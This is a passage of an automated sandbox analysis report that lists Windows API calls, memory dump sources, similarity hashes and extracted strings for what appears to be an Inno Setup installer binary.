                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A930,00400000,00000001,00000000,?,0040D0EC,00000000,?,00000000,?,?,00472538,0000000A,REGDLL_EXE), ref: 0040D1A9
                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A930,00400000,00000001,00000000,?,0040D0EC,00000000,?,00000000,?,?,00472538), ref: 0040D1C3
                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A930,00400000,00000001,00000000,?,0040D0EC,00000000,?,00000000,?), ref: 0040D1CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: aa8f23a2bd8c420f741050967d2c5a0f0f7f1affb72ddc930477baaa85d1b7ca
                                                                                  • Instruction ID: 6821519e71b1b75801c38617bfb69c1df8027abb733f678c26228490ee91d097
                                                                                  • Opcode Fuzzy Hash: aa8f23a2bd8c420f741050967d2c5a0f0f7f1affb72ddc930477baaa85d1b7ca
                                                                                  • Instruction Fuzzy Hash: FCF06DB36006046F9B04EEADA881D6B77DCDE88364310013FFD08EB246DA38DD018B78
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0048E450,?,?,?,004018B4), ref: 00401566
                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0048E450,?,?,?,004018B4), ref: 0040158B
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0048E450,?,?,?,004018B4), ref: 004015B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: ,Zz
                                                                                  • API String ID: 3668210933-1049774954
                                                                                  • Opcode ID: 36f7aa87c69037575b1d01687168553410f04d7dc9583558f1583642db97e319
                                                                                  • Instruction ID: e620a21e62513a2f0fa642cfe5042905436b9974054b4c49e0676f323240a32a
                                                                                  • Opcode Fuzzy Hash: 36f7aa87c69037575b1d01687168553410f04d7dc9583558f1583642db97e319
                                                                                  • Instruction Fuzzy Hash: 3CF0C8717403206AE7315A294C85F173AD4DBC5754F144075BE09FF3DAD6B8980083AD
                                                                                  APIs
                                                                                    • Part of subcall function 0042DBBC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004787FF,?,00000001,?,?,004787FF,?,00000001,00000000), ref: 0042DBD8
                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,004582D1), ref: 00453A94
                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,004582D1), ref: 00453A9D
                                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00453AAA
                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00453ABE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                  • String ID:
                                                                                  • API String ID: 4283692357-0
                                                                                  • Opcode ID: a42483cec443a85f2e446b063ad45c54b8aaf3e15e90fe5a7b9fc3e1fe35b60c
                                                                                  • Instruction ID: a59b9375a3b928148e51451218e895319c812fb0fca19ccf6b43cf813c7f9527
                                                                                  • Opcode Fuzzy Hash: a42483cec443a85f2e446b063ad45c54b8aaf3e15e90fe5a7b9fc3e1fe35b60c
                                                                                  • Instruction Fuzzy Hash: 8FF03AF6B4070036EA14BAB69C46F1B268C8F84745F14483EBA40EB2C3D97CDD05962D
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CountSleepTick
                                                                                  • String ID:
                                                                                  • API String ID: 2227064392-0
                                                                                  • Opcode ID: 8927b158d1183bc5e4eee0b04dc33300be9201000bb10294be4b545267278d97
                                                                                  • Instruction ID: 4348171bab196c37026d71ecba70a8127852601fec885172154e43f0b5b2c562
                                                                                  • Opcode Fuzzy Hash: 8927b158d1183bc5e4eee0b04dc33300be9201000bb10294be4b545267278d97
                                                                                  • Instruction Fuzzy Hash: B4E02B2230A54045DB2831BE1BC65BF454CCA81765B24853FF0CDD6252C49C4C4986BF
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0042EB1E
                                                                                  • IsWindowEnabled.USER32(?), ref: 0042EB28
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042EB34
                                                                                  • SetActiveWindow.USER32(?,?,000000EC,?,?), ref: 0042EB3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveEnabledLongVisible
                                                                                  • String ID:
                                                                                  • API String ID: 1354366509-0
                                                                                  • Opcode ID: 5d31c228c344c20b812704f9117cd73bb31c1101f21e1b3f6b5ecf75040561d7
                                                                                  • Instruction ID: 3ec95a69094aa8a889dbf35af9da8b417f34ea96e397185feea6d4685c23c656
                                                                                  • Opcode Fuzzy Hash: 5d31c228c344c20b812704f9117cd73bb31c1101f21e1b3f6b5ecf75040561d7
                                                                                  • Instruction Fuzzy Hash: F9E092B030432166E610F233ACC0E27AA6C5B05364F840823B957A6283D62DF810853C
                                                                                  APIs
                                                                                  • GetLastActivePopup.USER32(?), ref: 004241C4
                                                                                  • IsWindowVisible.USER32(?), ref: 004241D5
                                                                                  • IsWindowEnabled.USER32(?), ref: 004241DF
                                                                                  • SetForegroundWindow.USER32(?), ref: 004241E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                  • String ID:
                                                                                  • API String ID: 2280970139-0
                                                                                  • Opcode ID: 6906cbd8ad2df2bb2858e74c78ed63ca5c89f6a61b0146ba133771f8071492f2
                                                                                  • Instruction ID: ba8e091d320ec03eefe04027fc60167df43cc8bc07593f35f29ee438a14940f5
                                                                                  • Opcode Fuzzy Hash: 6906cbd8ad2df2bb2858e74c78ed63ca5c89f6a61b0146ba133771f8071492f2
                                                                                  • Instruction Fuzzy Hash: 36E08CAD70273513AE61B6362989ABB218CCD553443460027BC04FB283DF2CCFA0C1AC
                                                                                  APIs
                                                                                  • GlobalHandle.KERNEL32 ref: 00406277
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040627E
                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406283
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406289
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocHandleLockUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2167344118-0
                                                                                  • Opcode ID: febec6ed593572db2323e6cc3409c0e25f3e3d4d6c6a7ce8bb3dcaa930d1e7a0
                                                                                  • Instruction ID: ac93097bb4ba1240b9e32603a5e5193d1905c962d9d436e0b1c7c2bb43652313
                                                                                  • Opcode Fuzzy Hash: febec6ed593572db2323e6cc3409c0e25f3e3d4d6c6a7ce8bb3dcaa930d1e7a0
                                                                                  • Instruction Fuzzy Hash: 27B009C5A24A85B8EC0873B24C9BC3F451CE88472C784AB6E7504BA0839D7C9C012E3D
                                                                                  APIs
                                                                                  • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 004643B9
                                                                                  • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 004643BF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$EnableItemSystem
                                                                                  • String ID: CurPageChanged
                                                                                  • API String ID: 3692539535-2490978513
                                                                                  • Opcode ID: 030431ff1152d79dcca2e58d1c41f001001b973217e0097f427feb76d2af4316
                                                                                  • Instruction ID: 9954ff800ebfec7eae49177536d28eb3ebba91e59bb3b3a1ebbcee1d3a1dc509
                                                                                  • Opcode Fuzzy Hash: 030431ff1152d79dcca2e58d1c41f001001b973217e0097f427feb76d2af4316
                                                                                  • Instruction Fuzzy Hash: 7AA10934704204DFCB50DBA9D985EAE77E5EB88304F2540FAF9049B362DB38AE41DB49
                                                                                  APIs
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00471837,?,00000000,00000000,00000001,00000000,00470379,?,00000000), ref: 0047033D
                                                                                  Strings
                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 004701B1
                                                                                  • Failed to parse "reg" constant, xrefs: 00470344
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                  • API String ID: 3535843008-1938159461
                                                                                  • Opcode ID: cc38a7abe6172aea4ec4508910b868bfbe29741018025b1ee113fca4f85edce9
                                                                                  • Instruction ID: 0fcfb04f361c9b2308215be952885920083c604d7d41383ebb4056767ab2a4e8
                                                                                  • Opcode Fuzzy Hash: cc38a7abe6172aea4ec4508910b868bfbe29741018025b1ee113fca4f85edce9
                                                                                  • Instruction Fuzzy Hash: 3F813274E01148DFCB11DFA5C881ADEB7F9EF48314F5081AAE814AB391D778AE45CB98
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(0048BF15,00000000,00455013,?,?,00000000,0048E628,?,004725CC,00000000,004726E7,?,?,00000000,0048E628,00000000), ref: 00454EBC
                                                                                    • Part of subcall function 0044F5D0: WriteFile.KERNEL32(?,?,00000000,0044F802,00000000,00000000,?,?,?,0044F802,00000000,00451D99,?,0048BF15,00000000,00451E3A), ref: 0044F5E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileLocalTimeWrite
                                                                                  • String ID: $%.4u-%.2u-%.2u %.2u:%.2u:%.2u
                                                                                  • API String ID: 1093383541-3002923774
                                                                                  • Opcode ID: 046a64a69fd82bce2dbd0478a663175489ff2e3d65f4b1eb534f2ecb97429623
                                                                                  • Instruction ID: 99ae2c8fcea8beb8b8cc1ca7c1f84573af1c7a52bda42f915cc9c6c428d29e21
                                                                                  • Opcode Fuzzy Hash: 046a64a69fd82bce2dbd0478a663175489ff2e3d65f4b1eb534f2ecb97429623
                                                                                  • Instruction Fuzzy Hash: AB4192319046489FDB11DFA9D8517ADBBF4EF49309F10407AFC00AB292D7789E48CB69
                                                                                  Strings
                                                                                  • Failed to proceed to next wizard page; aborting., xrefs: 00465D18
                                                                                  • Failed to proceed to next wizard page; showing wizard., xrefs: 00465D2C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                  • API String ID: 0-1974262853
                                                                                  • Opcode ID: e7e9ad21c299f13d3625ee10a50d54cb3a899541c0f89b06db6bb5968193463b
                                                                                  • Instruction ID: a76b9be28c096ecd22f9228c804cec793e618f915840f685ed552ba4ff82a10f
                                                                                  • Opcode Fuzzy Hash: e7e9ad21c299f13d3625ee10a50d54cb3a899541c0f89b06db6bb5968193463b
                                                                                  • Instruction Fuzzy Hash: 8331B330A04B04AFD700EB65C986E9D77F8EB49314F5184BAF504AB392E738AE40CB5D
                                                                                  APIs
                                                                                  • GetActiveWindow.USER32 ref: 0045BE32
                                                                                    • Part of subcall function 0041EE1C: GetCurrentThreadId.KERNEL32 ref: 0041EE6B
                                                                                    • Part of subcall function 0041EE1C: 73A25940.USER32(00000000,0041EDCC,00000000,00000000,0041EE88,?,00000000,0041EEBF,?,?,?,00000000), ref: 0041EE71
                                                                                  • 7523D0A0.COMDLG32(0000004C,00000000,0045BE9F,?,00000000,0045BED3), ref: 0045BE67
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: 7523A25940ActiveCurrentThreadWindow
                                                                                  • String ID: L
                                                                                  • API String ID: 2641263021-2909332022
                                                                                  • Opcode ID: dbc76548e42643d2f00c005f6d5fc89039dafbff9f56db3f90a1568141b7047c
                                                                                  • Instruction ID: 1033a8a5b0bc7798218fbac59c7717844dfa3eaf64b85c08aa41f40721bb45f0
                                                                                  • Opcode Fuzzy Hash: dbc76548e42643d2f00c005f6d5fc89039dafbff9f56db3f90a1568141b7047c
                                                                                  • Instruction Fuzzy Hash: B73154B0D00748AFDF01DFA6C8519DEBBB9EB49304F45447AE904E7741D7789A04CB58
                                                                                  APIs
                                                                                    • Part of subcall function 004660D0: LoadBitmapA.USER32(00400000,DISKIMAGE), ref: 0046615D
                                                                                  • MessageBeep.USER32(00000000), ref: 00466056
                                                                                    • Part of subcall function 00422DC8: GetCapture.USER32 ref: 00422E1C
                                                                                    • Part of subcall function 00422DC8: GetCapture.USER32 ref: 00422E2B
                                                                                    • Part of subcall function 00422DC8: SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422E31
                                                                                    • Part of subcall function 00422DC8: ReleaseCapture.USER32 ref: 00422E36
                                                                                    • Part of subcall function 00422DC8: GetActiveWindow.USER32 ref: 00422E45
                                                                                    • Part of subcall function 00422DC8: SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422EC4
                                                                                    • Part of subcall function 00422DC8: SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422F28
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$CaptureSend$ActiveBeepBitmapLoadReleaseWindow
                                                                                  • String ID: *lF$fF
                                                                                  • API String ID: 2272996539-1132455169
                                                                                  • Opcode ID: 48ba2cecd12114e6c27cc9d866a1e5321e3c7e56ec90fd1391405add8f3a1753
                                                                                  • Instruction ID: df9d154b8efe67a57420f40d4805b1b39c9eb29234b92afbcdb5b22543ef79a1
                                                                                  • Opcode Fuzzy Hash: 48ba2cecd12114e6c27cc9d866a1e5321e3c7e56ec90fd1391405add8f3a1753
                                                                                  • Instruction Fuzzy Hash: 8421B634A04208AFCB01DFA9C881ADEBBF5EF49304F4244BAF804E7351D7796E01CA99
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0048E420,00000000,A), ref: 004025C7
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0048E420,0040263D), ref: 00402630
                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0048E420,0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0048E420,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0048E420,00401A89,00000000,00401A82,?,?,0040222E,0048E460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                  • String ID: A
                                                                                  • API String ID: 2227675388-3984982982
                                                                                  • Opcode ID: f41e55794ea43ac3035f8fa8c8f14dac4256f2db644ac3b44d3d56611b7a1b3c
                                                                                  • Instruction ID: 6bfcdc19d613764b02dffe077cb72475ad01ad610d0e7e09ccb1921c05517bd4
                                                                                  • Opcode Fuzzy Hash: f41e55794ea43ac3035f8fa8c8f14dac4256f2db644ac3b44d3d56611b7a1b3c
                                                                                  • Instruction Fuzzy Hash: 1B11E231B042046EE721AB7A9E1961A6AD49786758B24087FF404F32D2D9FD9C02835C
                                                                                  APIs
                                                                                    • Part of subcall function 00403CBC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CF6
                                                                                    • Part of subcall function 00403CBC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403D01
                                                                                  • SysFreeString.OLEAUT32(?), ref: 0044681A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$AllocByteCharFreeMultiWide
                                                                                  • String ID: NIL Interface Exception$Unknown Method
                                                                                  • API String ID: 3952431833-1023667238
                                                                                  • Opcode ID: c31f3f428eafa76cddb7d7f083b3d1a8270b7cc506089b97fc7540188e6eb262
                                                                                  • Instruction ID: 40030522256c4b46396fe019627c363379d7082ecde5330637f1268bf9a998af
                                                                                  • Opcode Fuzzy Hash: c31f3f428eafa76cddb7d7f083b3d1a8270b7cc506089b97fc7540188e6eb262
                                                                                  • Instruction Fuzzy Hash: D111E970A012449FE700EFA58C52A6EBBBCEB09304F52447EF500E7681DB79AD00C76A
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00489D84,?,00489D78,00000000,00489D5F), ref: 00489D2A
                                                                                  • CloseHandle.KERNEL32(00489DC4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00489D84,?,00489D78,00000000), ref: 00489D41
                                                                                    • Part of subcall function 00489C14: GetLastError.KERNEL32(00000000,00489CAC,?,?,?,?), ref: 00489C38
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateErrorHandleLastProcess
                                                                                  • String ID: D
                                                                                  • API String ID: 3798668922-2746444292
                                                                                  • Opcode ID: c15eed0dbf7d794a1635dd4f99ce4f7fb88737cf5371021ee5cd41362729477e
                                                                                  • Instruction ID: 351005f53adb7eff3084a2d7e91fab3d5dc4a38c91daf307e803848fcfed4954
                                                                                  • Opcode Fuzzy Hash: c15eed0dbf7d794a1635dd4f99ce4f7fb88737cf5371021ee5cd41362729477e
                                                                                  • Instruction Fuzzy Hash: 2D01A1B0604A08BFDB00EBA5CC42FAE77ECDF48704F54043ABA04E7291D6789E008B6C
                                                                                  APIs
                                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DB18
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DB58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$EnumQuery
                                                                                  • String ID: Inno Setup: No Icons
                                                                                  • API String ID: 1576479698-2016326496
                                                                                  • Opcode ID: 5e367299ebeb6252073a8c0258cd5a5f79e6777a2fe5b53bc9e9b34ad430ba81
                                                                                  • Instruction ID: 507aed31d3e10f3be7e67d5f2302ea6146636906272951a224078b14a6358b7d
                                                                                  • Opcode Fuzzy Hash: 5e367299ebeb6252073a8c0258cd5a5f79e6777a2fe5b53bc9e9b34ad430ba81
                                                                                  • Instruction Fuzzy Hash: FB01F7B3F853606AFB3045216D15B7B5E888B4AB60F66417BF940AA2C0D658BC0493AE
                                                                                  APIs
                                                                                    • Part of subcall function 00406ED4: DeleteFileA.KERNEL32(00000000,0048E628,0048BB48,00000000,0048BB9D,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EDF
                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 0046D0B6
